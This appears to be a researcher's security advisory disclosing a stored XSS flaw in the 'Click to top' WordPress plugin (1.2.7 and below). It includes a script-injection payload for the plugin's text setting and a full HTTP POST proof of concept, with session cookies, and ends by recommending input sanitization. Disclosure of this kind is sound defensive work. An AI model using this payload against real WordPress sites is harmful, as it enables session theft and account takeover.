Stored XSS Vulnerability in WordPress Click to top Plugin

The WordPress Click to top Plugin version 1.2.7 and below were found to be vulnerable to an authenticated stored XSS vulnerability while I was auditing the plugin.

Summary

The Click to top WordPress Plugin is used to include scroll to top feature in a WordPress blog. It was found to be vulnerable toa stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

Vulnerability

The Type scroll text field in the plugin settings page was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the changes. It is triggered when a user loads any page on the website. All WordPress websites using Click to top WordPress Plugin version 1.2.7 and below are affected.

The image below shows our javascript is being executed when the following string is inserted into the Type scroll text field.

Click To Top</script><script>alert(document.cookie)</script>

This vulnerability can be exploited by attckers to steal session cookies or execute any malicious javascript when a user visits the page.

Proof of Concept

POST /w/wp-admin/options.php HTTP/1.1
Host: 95.217.19.38
Content-Length: 722
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://95.217.19.38
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://95.217.19.38/w/wp-admin/options-general.php?page=click-to-top.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1597746976%7CBlobP8KWB7gDuqKN4SYfQexDQcLX5q74H4H2dnZzuRF%7Cb1aafc968a6212fc1ceba7657727836762d457f9b3fc1ac5d8f957c2aa46c16e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1597746976%7CBlobP8KWB7gDuqKN4SYfQexDQcLX5q74H4H2dnZzuRF%7Cf7f732afdad727391089966b6f76603baec4a9f086a16fa81bc56fe71dfd59ef; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597574177
Connection: close

option_page=click_top_style&action=update&_wpnonce=2502676c1e&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dclick-to-top.php&click_top_style%5Bbtn_style%5D=square&click_top_style%5Bhover_affect%5D=bubble-top&click_top_style%5Bbtn_type%5D=text&click_top_style%5Bselect_icon%5D=angle-double-up&click_top_style%5Bbtn_text%5D=Click+To+Top%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&click_top_style%5Bbg_color%5D=%23cccccc&click_top_style%5Bicon_color%5D=%23000000&click_top_style%5Bbg_hover_color%5D=%23555555&click_top_style%5Bhover_color%5D=%23ffffff&click_top_style%5Bscroll_opacity%5D=99&click_top_style%5Bscroll_padding%5D=5&click_top_style%5Bfont_size%5D=16&submit=Save+Changes

Recommendation

All user inputs should be sanitized before usage.